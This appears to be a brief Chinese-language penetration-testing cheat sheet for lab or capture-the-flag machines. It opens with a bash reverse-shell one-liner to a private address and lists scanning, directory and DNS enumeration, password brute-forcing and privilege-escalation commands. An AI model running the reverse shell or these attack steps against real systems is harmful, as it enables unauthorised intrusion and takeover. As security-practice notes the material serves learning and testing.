shell 命令
反弹 bash:bash -i >& /dev/tcp/192.168.56.109/444 0>&1
开启服务器
套路
发现 扫描
nmap -sn 192.168.56.1/24
nmap -p- -A -sV 192.168.56.x
nikto -h http://xx
gobuster dir --url 192.168.56.128 --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak
url路径枚举时,对得到的路径可以再继续枚举子路径
gobuster dns 枚举dns
hydra medusa 爆破密码,弱口令尝试
WEB 服务
先路径枚举, 看html网页源码,下载开源cms分析源码,用cewl搜集网页可用信息字符串
常见漏洞:交互处sqli、文件上传反弹shell
获得普通 shell
find / -perm -u=s -type f 2>/dev/null, /etc/crontab,有些定时不使用cron要用 pspy 才能看到
使用工具:linpeas.sh, pspy32 pspy64,